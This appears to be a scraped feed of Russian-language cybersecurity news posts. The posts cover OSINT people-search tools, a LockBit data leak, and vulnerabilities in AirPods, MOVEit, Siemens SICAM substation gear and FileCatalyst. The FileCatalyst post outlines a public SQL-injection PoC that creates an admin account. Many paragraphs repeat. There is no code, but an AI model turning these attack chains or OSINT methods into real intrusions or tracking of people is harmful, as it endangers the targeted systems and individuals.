In this article, we analyze XZ backdoor behavior inside OpenSSH, after it has achieved RSA-related function hook.
Forwarded from Life-Hack - Хакер
Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.
Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:
Первая серия материалов - "Введение в OSINT":
• Введение в OSINT
• Стороны, заинтересованные в OSINT информации
• Типы сбора информации
• Преимущества и проблемы OSINT
• Правовые и этические ограничения
• Цифровой след
• Google Dorking
Вторая серия материалов - "OSINT инструменты":
• Хакерские поисковые системы.
• OSINT на платформе Telegram.
• OSINT: theHarvester и HaveIbeenPwned.
• OSINT: Snoop, GHunt, ReconSpider.
• OSINT: Поиск по фото.
• Инструменты для OSINT в VKontakte и YouTube.
• OSINT: Отслеживание транспорта
Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!
P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3
P.P.S.: Ещё немного полезного по теме OSINT:
• OSINT collection.
• Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
• Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
• Как «пробить» человека в Интернете: используем операторы Google и логику
• Red Team Trickery.
• История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.
Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.
#OSINT #обучениеOSINT #статья
LH | Новости | Курсы | Мемы
Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:
Первая серия материалов - "Введение в OSINT":
• Введение в OSINT
• Стороны, заинтересованные в OSINT информации
• Типы сбора информации
• Преимущества и проблемы OSINT
• Правовые и этические ограничения
• Цифровой след
• Google Dorking
Вторая серия материалов - "OSINT инструменты":
• Хакерские поисковые системы.
• OSINT на платформе Telegram.
• OSINT: theHarvester и HaveIbeenPwned.
• OSINT: Snoop, GHunt, ReconSpider.
• OSINT: Поиск по фото.
• Инструменты для OSINT в VKontakte и YouTube.
• OSINT: Отслеживание транспорта
Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!
P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3
P.P.S.: Ещё немного полезного по теме OSINT:
• OSINT collection.
• Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
• Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
• Как «пробить» человека в Интернете: используем операторы Google и логику
• Red Team Trickery.
• История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.
Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.
#OSINT #обучениеOSINT #статья
LH | Новости | Курсы | Мемы
͏LockBit сдержала обещание и опубликовала анонсированные украденные у Федеральной резервной системы США данные после провала переговоров, в ходе которым им предложили 50 000 долларов в качестве выкупа.
Банда разместила 21 ссылку с файлами, по-видимому, родительских каталогов, торренты и сжатые архивные файлы, которые, как оказалось, принадлежат одному из финансовых учреждений США - volve Bank and Trust.
Ипотечный кредитор со штаб-квартирой в Мемфисе, штат Теннесси, обслуживает частных лиц и малый бизнес как минимум в 17 штатах, его активы в 2022 году составили 1,3 миллиарда долларов.
Evolve также известна своим открытым банковским партнерством с финтех-платформами Mastercard, Visa, Affirm, Melio, Stripe и Airwallex.
Совсем недавно банк и его материнская компания Evolve Bancorp Inc. подверглись рестрикциям ФРС за финансовые нарушения и за участие в небезопасной банковской деятельности.
Вполне веротяно, что Акела промахнулся или банда провернулся мощны пиар-трюк, но как бы то ни было - с момента появления ФРС на DLS ситуация никак не комментировалась представителями структуры до настоящего времени, что подозрительно.
Так что в любом случае, будем посмотреть.
Банда разместила 21 ссылку с файлами, по-видимому, родительских каталогов, торренты и сжатые архивные файлы, которые, как оказалось, принадлежат одному из финансовых учреждений США - volve Bank and Trust.
Ипотечный кредитор со штаб-квартирой в Мемфисе, штат Теннесси, обслуживает частных лиц и малый бизнес как минимум в 17 штатах, его активы в 2022 году составили 1,3 миллиарда долларов.
Evolve также известна своим открытым банковским партнерством с финтех-платформами Mastercard, Visa, Affirm, Melio, Stripe и Airwallex.
Совсем недавно банк и его материнская компания Evolve Bancorp Inc. подверглись рестрикциям ФРС за финансовые нарушения и за участие в небезопасной банковской деятельности.
Вполне веротяно, что Акела промахнулся или банда провернулся мощны пиар-трюк, но как бы то ни было - с момента появления ФРС на DLS ситуация никак не комментировалась представителями структуры до настоящего времени, что подозрительно.
Так что в любом случае, будем посмотреть.
Apple выпустила обновление прошивки для AirPods с исправлением уязвимости, которая позволяет получить несанкционированный доступ к наушникам.
Проблема аутентификации, отслеживаемая как CVE-2024-27867, затрагивает AirPods (2-го поколения и новее), AirPods Pro (все модели), AirPods Max, Powerbeats Pro и Beats Fit Pro.
Как поясняют в Apple, когда наушники отправляют запрос на подключение к одному из ранее сопряженных устройств, злоумышленник в радиусе действия Bluetooth может подделать предполагаемое исходное устройство и получить доступ к наушникам.
Другими словами, противник, находящийся в физической близости, может использовать уязвимость для прослушивания переговоров.
Обнаружение и раскрытие приписывают исследователю Йонасу Дресслеру, проблема решена путем улучшения управления состоянием в рамках обновления прошивки AirPods 6A326, AirPods 6F8 и Beats 6F8.
Проблема аутентификации, отслеживаемая как CVE-2024-27867, затрагивает AirPods (2-го поколения и новее), AirPods Pro (все модели), AirPods Max, Powerbeats Pro и Beats Fit Pro.
Как поясняют в Apple, когда наушники отправляют запрос на подключение к одному из ранее сопряженных устройств, злоумышленник в радиусе действия Bluetooth может подделать предполагаемое исходное устройство и получить доступ к наушникам.
Другими словами, противник, находящийся в физической близости, может использовать уязвимость для прослушивания переговоров.
Обнаружение и раскрытие приписывают исследователю Йонасу Дресслеру, проблема решена путем улучшения управления состоянием в рамках обновления прошивки AirPods 6A326, AirPods 6F8 и Beats 6F8.
Apple Support
About firmware updates for AirPods - Apple Support
Learn about changes and features included in the firmware updates for your AirPods.
Исследователи сообщают о начавшейся эксплуатации недавно исправленной критической CVE-2024-5806 в MOVEit Transfer.
Буквально на неделе Progress Software анонсировала исправления для двух критических уязвимостей обхода аутентификации CVE-2024-5805 и CVE-2024-5806, затрагивающих MOVEit Transfer.
Обе описываются как проблемы неправильной аутентификации в SFTP-модуле продукта MOVEit Transfer.
CVE-2024-5806 исправлен вместе с выпуском MOVEit Transfer версий 2023.0.11, 2023.1.6 и 2024.0.2. CVE-2024-5805 влияет только на версию 2024.0.0 и исправлена в выпуске версии 2024.0.1.
Причем в своих рекомендациях по CVE-2024-5806 Progress отметила, что недавно выявленная уязвимость стороннего компонента повышает риск этой CVE. Компания поделилась мерами смягчения, пока не станет доступен патч.
В свою очередь, WatchTowr обнародовала технические подробности для CVE-2024-5806 и продемонстрировала, как ее использовать для получения доступа к уязвимой системе.
Кроме того, WatchTowr также расчехляла и вторую уязвимость, которая затрагивает библиотеку сервера IPWorks SSH, используемую MOVEit Transfer.
Библиотека подвержена уязвимости принудительной аутентификации, которая, вероятно, затрагивает все использующие ее приложения, что потенциально позволяет добиться полного взлома системы.
Вскоре после того, как подробности были обнародованы Shadowserver Foundation сообщила о попытках эксплуатации CVE-2024-5806.
Однако Rapid7 отметила в своем блоге, что несмотря на фиксацию Shadowserver попыток взлома в своих ловушках, активность ловушек не всегда коррелирует с активностью угроз в реальных производственных средах.
Тем не менее, Shadowserver сообщает, что около 1700 экземпляров MOVEit Transfer доступны в Интернете, большинство из которых находятся в Северной Америке.
А по данным Censys их насчитывается 2700, большинство из которых также находятся в США, далее следуют Великобритания и Германия.
И это число, как отмечают исследователи, соответствует количеству жертв предыдущего инцидента с Cl0p. Совпадение?
Буквально на неделе Progress Software анонсировала исправления для двух критических уязвимостей обхода аутентификации CVE-2024-5805 и CVE-2024-5806, затрагивающих MOVEit Transfer.
Обе описываются как проблемы неправильной аутентификации в SFTP-модуле продукта MOVEit Transfer.
CVE-2024-5806 исправлен вместе с выпуском MOVEit Transfer версий 2023.0.11, 2023.1.6 и 2024.0.2. CVE-2024-5805 влияет только на версию 2024.0.0 и исправлена в выпуске версии 2024.0.1.
Причем в своих рекомендациях по CVE-2024-5806 Progress отметила, что недавно выявленная уязвимость стороннего компонента повышает риск этой CVE. Компания поделилась мерами смягчения, пока не станет доступен патч.
В свою очередь, WatchTowr обнародовала технические подробности для CVE-2024-5806 и продемонстрировала, как ее использовать для получения доступа к уязвимой системе.
Кроме того, WatchTowr также расчехляла и вторую уязвимость, которая затрагивает библиотеку сервера IPWorks SSH, используемую MOVEit Transfer.
Библиотека подвержена уязвимости принудительной аутентификации, которая, вероятно, затрагивает все использующие ее приложения, что потенциально позволяет добиться полного взлома системы.
Вскоре после того, как подробности были обнародованы Shadowserver Foundation сообщила о попытках эксплуатации CVE-2024-5806.
Однако Rapid7 отметила в своем блоге, что несмотря на фиксацию Shadowserver попыток взлома в своих ловушках, активность ловушек не всегда коррелирует с активностью угроз в реальных производственных средах.
Тем не менее, Shadowserver сообщает, что около 1700 экземпляров MOVEit Transfer доступны в Интернете, большинство из которых находятся в Северной Америке.
А по данным Censys их насчитывается 2700, большинство из которых также находятся в США, далее следуют Великобритания и Германия.
И это число, как отмечают исследователи, соответствует количеству жертв предыдущего инцидента с Cl0p. Совпадение?
Progress
MOVEit Gateway Critical Security Alert Bulletin – June 2024 – (CVE-2024-5805) - Progress Community
CVSS: 9.1 (CRITICAL)
An Improper Authentication vulnerability in Progress MOVEit Gateway (SFTP module) allows Authentication Bypass.
This issue affects MOVEit Gateway: 2024.0.0.
An Improper Authentication vulnerability in Progress MOVEit Gateway (SFTP module) allows Authentication Bypass.
This issue affects MOVEit Gateway: 2024.0.0.
Исследователи из SEC Consult предупреждают, что уязвимости Siemens Sicam могут быть применены в реальных атаках на энергетический сектор
В мае Siemens выпустила обновления для удаленного терминала Sicam A8000, сетевых датчиков Sicam EGS и ПО автоматизации электропитания Sicam 8, которые устраняют два недостатка высокой степени серьезности и один средней.
Одна из них, CVE-2024-31484, представляет собой проблему переполнения буфера, которую можно использовать для чтения конфиденциальных данных из памяти, что может привести к RCE в контексте текущего процесса или состоянию DoS.
Вторая CVE-2024-31485 связана с внедрением команд в веб-интерфейс продуктов и позволяет злоумышленнику перехватывать имя пользователя и пароль с повышенными привилегиями, позволяя выполнять произвольный код от имени пользователя root.
Третья проблема, CVE-2024-31486, связана с неправильной защитой паролей клиентов MQTT, что позволяет злоумышленнику, имеющему физический или удаленный доступ к оболочке, получить учетные данные.
В июньском сообщении промышленный гигант сообщил клиентам, что CVE-2024-31484 также влияет и на устройства SICAM AK3/TM/BC.
Затронутые продукты — это решения для электросетей, обеспечивающие автоматизацию подстанций.
В свою очередь, SEC Consult, которой приписывают обнаружение этих уязвимостей, в среду представила подробное описание для каждой из уязвимостей, пояснив также, как злоумышленники могут использовать выявленные уязвимости в реальной атаке.
Злоумышленнику необходимо сначала получить доступ на уровне сети к порту 443/80, чтобы взаимодействовать с целью.
Злоупотребляя CVE-2024-31484, атакующий может утечь информацию из сегмента глобальной памяти, что может способствовать дальнейшим атакам.
Кроме того, если злоумышленнику удалось получить учетную запись с низким уровнем привилегий для SICAM-WEB, возможно задействовать CVE-2024-31485 для кражи пароля администратора.
Переключившись на его учетную запись, злоумышленник может перенастроить ПЛК и тем самым дестабилизировать подстанцию.
Так что все пароли следует изменить после исправления уязвимости, поскольку их конфиденциальность теперь не может быть гарантирована.
В мае Siemens выпустила обновления для удаленного терминала Sicam A8000, сетевых датчиков Sicam EGS и ПО автоматизации электропитания Sicam 8, которые устраняют два недостатка высокой степени серьезности и один средней.
Одна из них, CVE-2024-31484, представляет собой проблему переполнения буфера, которую можно использовать для чтения конфиденциальных данных из памяти, что может привести к RCE в контексте текущего процесса или состоянию DoS.
Вторая CVE-2024-31485 связана с внедрением команд в веб-интерфейс продуктов и позволяет злоумышленнику перехватывать имя пользователя и пароль с повышенными привилегиями, позволяя выполнять произвольный код от имени пользователя root.
Третья проблема, CVE-2024-31486, связана с неправильной защитой паролей клиентов MQTT, что позволяет злоумышленнику, имеющему физический или удаленный доступ к оболочке, получить учетные данные.
В июньском сообщении промышленный гигант сообщил клиентам, что CVE-2024-31484 также влияет и на устройства SICAM AK3/TM/BC.
Затронутые продукты — это решения для электросетей, обеспечивающие автоматизацию подстанций.
В свою очередь, SEC Consult, которой приписывают обнаружение этих уязвимостей, в среду представила подробное описание для каждой из уязвимостей, пояснив также, как злоумышленники могут использовать выявленные уязвимости в реальной атаке.
Злоумышленнику необходимо сначала получить доступ на уровне сети к порту 443/80, чтобы взаимодействовать с целью.
Злоупотребляя CVE-2024-31484, атакующий может утечь информацию из сегмента глобальной памяти, что может способствовать дальнейшим атакам.
Кроме того, если злоумышленнику удалось получить учетную запись с низким уровнем привилегий для SICAM-WEB, возможно задействовать CVE-2024-31485 для кражи пароля администратора.
Переключившись на его учетную запись, злоумышленник может перенастроить ПЛК и тем самым дестабилизировать подстанцию.
Так что все пароли следует изменить после исправления уязвимости, поскольку их конфиденциальность теперь не может быть гарантирована.
SEC Consult
Multiple Vulnerabilities in Siemens Power Automation Products (CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE)
Multiple vulnerabilities were discovered in Siemens Energy automation products. Information could be leaked via an unauthenticated buffer-overread. Further, authenticated privilege escalation was possible via missing input sanitization. Finally, an attacker…
Исследователи F.A.C.C.T. сообщают о новой группе ReaverBits, нацеленной на российские компании посредством вредоносных рассылок от имени компаний и министерств.
К настоящему времени удалось задетектить около пяти рассылкок группы, две из которых были в декабре 2023 года, еще две - в январе 2024 года, а последняя - в мае.
Атаки были направлены на федеральный фонд, а также российские компании из сферы ритейла, телекоммуникаций, процессинга, агропромышленного комплекса.
Наименование обусловлено тем, что атакующие похищали конфиденциальные данные с помощью шпионского ПО MetaStealer, отсюда «reaver» (в переводе «вор»), а «bits» – из-за использования в URL-адресах «bitbucket» и «bitrix».
Группа активно полагается на спуфинг, в качестве нагрузки использует уже названный MetaStealer.
В одной из атак группа применяла загрузчик LuckyDownloader, предположительно, воспользовавшись услугой стороннего актора, отслеживаемого по имени LuckyBogdan.
Технические подробности каждой из атак ReaverBits, включая IoC и MITRE ATT&CK, - в отчете.
К настоящему времени удалось задетектить около пяти рассылкок группы, две из которых были в декабре 2023 года, еще две - в январе 2024 года, а последняя - в мае.
Атаки были направлены на федеральный фонд, а также российские компании из сферы ритейла, телекоммуникаций, процессинга, агропромышленного комплекса.
Наименование обусловлено тем, что атакующие похищали конфиденциальные данные с помощью шпионского ПО MetaStealer, отсюда «reaver» (в переводе «вор»), а «bits» – из-за использования в URL-адресах «bitbucket» и «bitrix».
Группа активно полагается на спуфинг, в качестве нагрузки использует уже названный MetaStealer.
В одной из атак группа применяла загрузчик LuckyDownloader, предположительно, воспользовавшись услугой стороннего актора, отслеживаемого по имени LuckyBogdan.
Технические подробности каждой из атак ReaverBits, включая IoC и MITRE ATT&CK, - в отчете.
F6
Карты биты: новая группа ReaverBits атакует российские компании - F6
Специалисты F6 Threat Intelligence обнаружили новую преступную группу, атакующую российские организации от имени компаний и министерств.
Forwarded from Social Engineering
• Snoop — один из самых перспективных #OSINT инструментов для поиска
user_name с учётом СНГ локаций. 90% из Вас уже слышали об этом инструменте и в более подробном описании он не нуждается.• Две недели назад была опубликована новая версия (1.4.1) этого инструмента, которая включает в себя следующие изменения:
- Расширена поисковая web-base Snoop до 4200+ сайтов (было 3700);
- Улучшен алгоритм агрессивного режима поиска: опция
--quick/-q в Snoop на Windows (ускорение поиска составляет от 5% до 200% в зависимости от версии Windows и производительности ПК, снижено потребление ОЗУ);- В блок 'snoop info' опции '--version/-V' добавлен предварительно расчетный параметр;
- Обновлен формат дат в CLI/отчетах согласно международному стандарту ISO 8601.
• Полное описание обновления читайте в Changelog'е.
• Скачать Snoop для Windows и Linux можно отсюда;
• База данных из 4200+ ресурсов;
• Документация \ подробное руководство;
• Автор.
• Дополнительная информация доступна по хештегу #OSINT и в наших подборках: https://xn--r1a.website/Social_engineering/3202
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Fortra предупреждает о критической уязвимости FileCatalyst Workflow SQLi, для которой уже доступен PoC.
Решение FileCatalyst Workflow с поддержкой объемных файлов
используется организациями по всему миру для ускорения передачи данных и совместной работы в частных облачных пространствах.
CVE-2024-5276 (CVSS v3.1:9.8) была обнаружена исследователями Tenable 15 мая 2024 года и позволяет злоумышленникам, не прошедшим проверку подлинности, создавать пользователей-администраторов и манипулировать данными в базе приложения.
Уязвимость затрагивает FileCatalyst Workflow 5.1.6 (сборка 135 и более ранние версии), необходимые исправления включены в FileCatalyst Workflow 5.1.6 (сборка 139).
При этом эксплойт без аутентификации также требует, чтобы на целевом экземпляре был включен анонимный доступ. В противном случае для использования CVE-2024-5276 потребуется аутентификация.
Tenable впервые сообщила о проблеме Fortra 22 мая, одновременно представив PoC-эксплойт, который выкатила в паблик сразу вслед за публикацией бюллетеня по безопасности Fortra
Эксплойт демонстрирует, как анонимный удаленный злоумышленник может выполнить SQL-инъекцию через параметр jobID в различных конечных точках URL-адресов веб-приложения Workflow.
Проблема в том, что метод findJob использует предоставленный пользователем идентификатор задания без очистки входных данных для формирования предложения WHERE в запросе SQL, что позволяет злоумышленнику вставить вредоносный код.
Скрипт Tenable анонимно входит в приложение FileCatalyst Workflow и выполняет SQL-инъекцию через параметр jobID, чтобы добавить нового пользователя-администратора (operator) с известным паролем (password123).
В конце концов он получает токен и использует вновь созданные учетные данные администратора для входа в уязвимую конечную точку.
Несмотря на то, что сообщений об активном использовании этой проблемы еще не поступало, появление работающего PoC быстро изменит ситуацию. Можно не сомневаться, операторы Clop уже тестируют новую игрушку.
Решение FileCatalyst Workflow с поддержкой объемных файлов
используется организациями по всему миру для ускорения передачи данных и совместной работы в частных облачных пространствах.
CVE-2024-5276 (CVSS v3.1:9.8) была обнаружена исследователями Tenable 15 мая 2024 года и позволяет злоумышленникам, не прошедшим проверку подлинности, создавать пользователей-администраторов и манипулировать данными в базе приложения.
Уязвимость затрагивает FileCatalyst Workflow 5.1.6 (сборка 135 и более ранние версии), необходимые исправления включены в FileCatalyst Workflow 5.1.6 (сборка 139).
При этом эксплойт без аутентификации также требует, чтобы на целевом экземпляре был включен анонимный доступ. В противном случае для использования CVE-2024-5276 потребуется аутентификация.
Tenable впервые сообщила о проблеме Fortra 22 мая, одновременно представив PoC-эксплойт, который выкатила в паблик сразу вслед за публикацией бюллетеня по безопасности Fortra
Эксплойт демонстрирует, как анонимный удаленный злоумышленник может выполнить SQL-инъекцию через параметр jobID в различных конечных точках URL-адресов веб-приложения Workflow.
Проблема в том, что метод findJob использует предоставленный пользователем идентификатор задания без очистки входных данных для формирования предложения WHERE в запросе SQL, что позволяет злоумышленнику вставить вредоносный код.
Скрипт Tenable анонимно входит в приложение FileCatalyst Workflow и выполняет SQL-инъекцию через параметр jobID, чтобы добавить нового пользователя-администратора (operator) с известным паролем (password123).
В конце концов он получает токен и использует вновь созданные учетные данные администратора для входа в уязвимую конечную точку.
Несмотря на то, что сообщений об активном использовании этой проблемы еще не поступало, появление работающего PoC быстро изменит ситуацию. Можно не сомневаться, операторы Clop уже тестируют новую игрушку.
Tenable®
Fortra FileCatalyst Workflow Unauthenticated SQLi
A SQL injection vulnerability exists in Fortra FileCatalyst Workflow v5.1.6 build 135 and earlier.A user-supplied jobID is used to form the WHERE clause in an SQL query: